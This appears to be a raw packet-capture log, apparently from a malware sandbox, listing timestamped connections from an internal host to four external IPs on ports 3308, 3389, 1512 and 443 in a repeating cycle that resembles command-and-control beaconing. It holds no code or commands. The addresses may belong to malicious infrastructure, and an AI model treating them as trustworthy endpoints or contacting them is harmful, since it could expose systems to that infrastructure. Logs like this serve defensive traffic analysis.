Jan 12, 2021 07:41:14.066298008 CET	3308	49315	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:14.066538095 CET	49315	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:14.107146025 CET	3308	49315	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:14.109730959 CET	3308	49315	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:14.109755039 CET	3308	49315	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:14.222942114 CET	3308	49315	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:14.222997904 CET	3308	49315	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:14.223321915 CET	49315	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:14.226829052 CET	49315	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:14.269870043 CET	3308	49315	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:14.340428114 CET	49316	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:14.394278049 CET	3389	49316	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:14.394366980 CET	49316	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:14.395061970 CET	49316	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:14.449296951 CET	3389	49316	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:14.471359015 CET	3389	49316	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:14.471385956 CET	3389	49316	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:14.471479893 CET	49316	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:14.486176014 CET	49316	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:14.546917915 CET	3389	49316	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:14.547210932 CET	49316	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:14.554622889 CET	49316	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:14.554728985 CET	49316	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:14.608124018 CET	3389	49316	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:14.608386040 CET	49316	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:14.647260904 CET	3389	49316	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:14.661695004 CET	3389	49316	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:14.661727905 CET	3389	49316	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:14.752531052 CET	3389	49316	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:14.752587080 CET	3389	49316	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:14.752849102 CET	49316	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:14.756586075 CET	49316	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:14.810010910 CET	3389	49316	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:14.874866962 CET	49317	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:14.927923918 CET	1512	49317	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:14.928006887 CET	49317	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:14.929085016 CET	49317	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:14.981818914 CET	1512	49317	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:14.989063025 CET	1512	49317	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:14.989092112 CET	1512	49317	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:14.989175081 CET	49317	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:15.003261089 CET	49317	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:15.057708979 CET	1512	49317	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:15.057976961 CET	49317	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:15.068749905 CET	49317	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:15.068978071 CET	49317	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:15.121670961 CET	1512	49317	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:15.121889114 CET	49317	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:15.160932064 CET	1512	49317	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:15.174611092 CET	1512	49317	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:15.174633026 CET	1512	49317	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:15.274912119 CET	1512	49317	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:15.274943113 CET	1512	49317	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:15.275135040 CET	49317	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:15.278947115 CET	49317	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:15.332235098 CET	1512	49317	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:15.388179064 CET	49318	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:15.440392017 CET	443	49318	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:15.440465927 CET	49318	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:15.441340923 CET	49318	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:15.493247032 CET	443	49318	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:15.507910967 CET	443	49318	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:15.507987976 CET	49318	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:15.518284082 CET	49318	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:15.572838068 CET	443	49318	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:15.573071003 CET	49318	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:15.580055952 CET	49318	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:15.580349922 CET	49318	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:15.632481098 CET	443	49318	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:15.632520914 CET	443	49318	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:15.635850906 CET	49318	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:15.687973022 CET	443	49318	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:15.688146114 CET	443	49318	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:15.807944059 CET	443	49318	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:15.807985067 CET	443	49318	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:15.808212996 CET	49318	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:15.811384916 CET	49318	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:15.864110947 CET	443	49318	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:15.916084051 CET	49319	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:15.959189892 CET	3308	49319	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:15.959387064 CET	49319	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:15.960282087 CET	49319	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:16.003144026 CET	3308	49319	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:16.017955065 CET	3308	49319	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:16.017982006 CET	3308	49319	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:16.018137932 CET	49319	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:16.030368090 CET	49319	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:16.075790882 CET	3308	49319	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:16.075881004 CET	49319	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:16.081365108 CET	49319	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:16.081614017 CET	49319	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:16.124546051 CET	3308	49319	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:16.124655008 CET	49319	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:16.165020943 CET	3308	49319	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:16.167563915 CET	3308	49319	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:16.167588949 CET	3308	49319	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:16.280685902 CET	3308	49319	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:16.280709982 CET	3308	49319	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:16.280761003 CET	49319	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:16.284317017 CET	49319	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:16.327380896 CET	3308	49319	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:16.399204969 CET	49320	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:16.452748060 CET	3389	49320	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:16.452846050 CET	49320	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:16.453764915 CET	49320	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:16.507035017 CET	3389	49320	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:16.526262045 CET	3389	49320	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:16.526287079 CET	3389	49320	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:16.526376963 CET	49320	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:16.534974098 CET	49320	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:16.594424963 CET	3389	49320	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:16.594635010 CET	49320	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:16.600538969 CET	49320	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:16.600670099 CET	49320	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:16.654035091 CET	3389	49320	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:16.654268980 CET	49320	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:16.693381071 CET	3389	49320	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:16.707771063 CET	3389	49320	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:16.707811117 CET	3389	49320	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:16.796300888 CET	3389	49320	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:16.796327114 CET	3389	49320	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:16.796515942 CET	49320	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:16.796565056 CET	49320	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:16.800497055 CET	49320	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:16.854017019 CET	3389	49320	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:16.917202950 CET	49321	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:16.970040083 CET	1512	49321	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:16.971061945 CET	49321	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:16.972301960 CET	49321	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:17.025127888 CET	1512	49321	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:17.032222986 CET	1512	49321	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:17.032267094 CET	1512	49321	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:17.032337904 CET	49321	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:17.032376051 CET	49321	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:17.045036077 CET	49321	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:17.099237919 CET	1512	49321	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:17.099457979 CET	49321	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:17.106729984 CET	49321	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:17.106961012 CET	49321	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:17.159703016 CET	1512	49321	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:17.159893990 CET	49321	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:17.198657990 CET	1512	49321	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:17.213298082 CET	1512	49321	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:17.314249039 CET	1512	49321	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:17.314280987 CET	1512	49321	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:17.314460993 CET	49321	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:17.316876888 CET	49321	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:17.428194046 CET	1512	49321	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:17.429680109 CET	49322	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:17.481460094 CET	443	49322	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:17.481673956 CET	49322	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:17.482711077 CET	49322	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:17.534498930 CET	443	49322	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:17.549895048 CET	443	49322	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:17.550002098 CET	49322	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:17.560692072 CET	49322	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:17.614980936 CET	443	49322	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:17.615187883 CET	49322	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:17.625353098 CET	49322	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:17.625454903 CET	49322	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:17.677087069 CET	443	49322	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:17.677448034 CET	49322	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:17.714973927 CET	443	49322	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:17.729192019 CET	443	49322	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:17.729244947 CET	443	49322	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:17.848906994 CET	443	49322	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:17.848958969 CET	443	49322	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:17.849195004 CET	49322	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:17.852411032 CET	49322	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:17.904119968 CET	443	49322	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:17.962047100 CET	49323	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:18.005639076 CET	3308	49323	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:18.005757093 CET	49323	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:18.007287979 CET	49323	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:18.050484896 CET	3308	49323	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:18.061063051 CET	3308	49323	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:18.061110973 CET	3308	49323	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:18.061177969 CET	49323	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:18.061229944 CET	49323	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:18.079247952 CET	49323	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:18.124305964 CET	3308	49323	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:18.124671936 CET	49323	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:18.140717983 CET	49323	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:18.141185045 CET	49323	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:18.184427977 CET	3308	49323	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:18.184825897 CET	49323	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:18.228018045 CET	3308	49323	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:18.342329979 CET	3308	49323	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:18.342370033 CET	3308	49323	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:18.342578888 CET	49323	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:18.345966101 CET	49323	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:18.389108896 CET	3308	49323	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:18.462234974 CET	49324	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:18.516611099 CET	3389	49324	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:18.516727924 CET	49324	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:18.518174887 CET	49324	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:18.572158098 CET	3389	49324	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:18.596816063 CET	3389	49324	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:18.596872091 CET	3389	49324	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:18.596925020 CET	49324	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:18.596982002 CET	49324	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:18.602787018 CET	49324	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:18.664153099 CET	3389	49324	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:18.664261103 CET	49324	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:18.669380903 CET	49324	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:18.669462919 CET	49324	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:18.723586082 CET	3389	49324	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:18.723757029 CET	49324	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:18.764127970 CET	3389	49324	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:18.778678894 CET	3389	49324	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:18.778733969 CET	3389	49324	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:18.868741035 CET	3389	49324	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:18.868810892 CET	3389	49324	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:18.868983030 CET	49324	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:18.869046926 CET	49324	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:18.872446060 CET	49324	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:18.926559925 CET	3389	49324	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:18.988066912 CET	49325	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:19.040990114 CET	1512	49325	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:19.041124105 CET	49325	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:19.042321920 CET	49325	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:19.095066071 CET	1512	49325	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:19.101941109 CET	1512	49325	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:19.101980925 CET	1512	49325	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:19.102041960 CET	49325	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:19.102070093 CET	49325	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:19.110219955 CET	49325	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:19.164037943 CET	1512	49325	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:19.164175987 CET	49325	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:19.169787884 CET	49325	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:19.170047998 CET	49325	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:19.222676992 CET	1512	49325	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:19.222860098 CET	49325	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:19.275557995 CET	1512	49325	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:19.375660896 CET	1512	49325	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:19.375686884 CET	1512	49325	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:19.375734091 CET	49325	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:19.375765085 CET	49325	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:19.378623009 CET	49325	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:19.431202888 CET	1512	49325	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:19.490217924 CET	49326	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:19.542469025 CET	443	49326	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:19.544091940 CET	49326	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:19.583760977 CET	49326	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:19.635895967 CET	443	49326	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:19.650753021 CET	443	49326	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:19.652133942 CET	49326	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:19.740998030 CET	49326	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:19.795536041 CET	443	49326	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:19.796051979 CET	49326	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:19.800899029 CET	49326	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:19.801117897 CET	49326	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:19.853090048 CET	443	49326	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:19.856152058 CET	49326	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:19.908245087 CET	443	49326	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:19.908365011 CET	443	49326	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:20.026290894 CET	443	49326	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:20.026319027 CET	443	49326	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:20.026456118 CET	49326	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:20.028975964 CET	49326	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:20.080946922 CET	443	49326	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:20.143537998 CET	49327	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:20.186588049 CET	3308	49327	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:20.186748981 CET	49327	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:20.187506914 CET	49327	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:20.230473042 CET	3308	49327	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:20.246706009 CET	3308	49327	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:20.246721983 CET	3308	49327	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:20.246767044 CET	49327	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:20.246783972 CET	49327	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:20.259764910 CET	49327	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:20.305352926 CET	3308	49327	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:20.308173895 CET	49327	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:20.312522888 CET	49327	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:20.312671900 CET	49327	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:20.355638981 CET	3308	49327	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:20.356319904 CET	49327	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:20.394926071 CET	3308	49327	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:20.399391890 CET	3308	49327	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:20.399419069 CET	3308	49327	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:20.512238979 CET	3308	49327	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:20.512264013 CET	3308	49327	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:20.512442112 CET	49327	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:20.518269062 CET	49327	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:20.561501980 CET	3308	49327	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:20.946460009 CET	49328	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:20.999881983 CET	3389	49328	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:20.999962091 CET	49328	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:21.000616074 CET	49328	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:21.054294109 CET	3389	49328	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:21.069741011 CET	3389	49328	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:21.069777966 CET	3389	49328	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:21.069839001 CET	49328	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:21.069891930 CET	49328	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:21.076401949 CET	49328	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:21.136797905 CET	3389	49328	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:21.136862040 CET	49328	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:21.143186092 CET	49328	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:21.143357992 CET	49328	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:21.197900057 CET	3389	49328	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:21.198097944 CET	49328	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:21.237365961 CET	3389	49328	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:21.251827002 CET	3389	49328	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:21.251872063 CET	3389	49328	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:21.342114925 CET	3389	49328	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:21.342170000 CET	3389	49328	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:21.342252970 CET	49328	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:21.342284918 CET	49328	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:21.347938061 CET	49328	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:21.401501894 CET	3389	49328	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:21.487143040 CET	49329	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:21.540086031 CET	1512	49329	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:21.540215969 CET	49329	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:21.541579008 CET	49329	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:21.594343901 CET	1512	49329	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:21.601116896 CET	1512	49329	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:21.601140022 CET	1512	49329	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:21.601224899 CET	49329	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:21.609679937 CET	49329	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:21.663744926 CET	1512	49329	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:21.664185047 CET	49329	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:21.674273014 CET	49329	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:21.674433947 CET	49329	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:21.727001905 CET	1512	49329	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:21.727217913 CET	49329	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:21.765084028 CET	1512	49329	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:21.780252934 CET	1512	49329	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:21.780284882 CET	1512	49329	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:21.884433031 CET	1512	49329	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:21.884465933 CET	1512	49329	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:21.884738922 CET	49329	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:21.890572071 CET	49329	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:21.943543911 CET	1512	49329	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:22.001773119 CET	49330	443	192.168.2.22	77.220.64.37
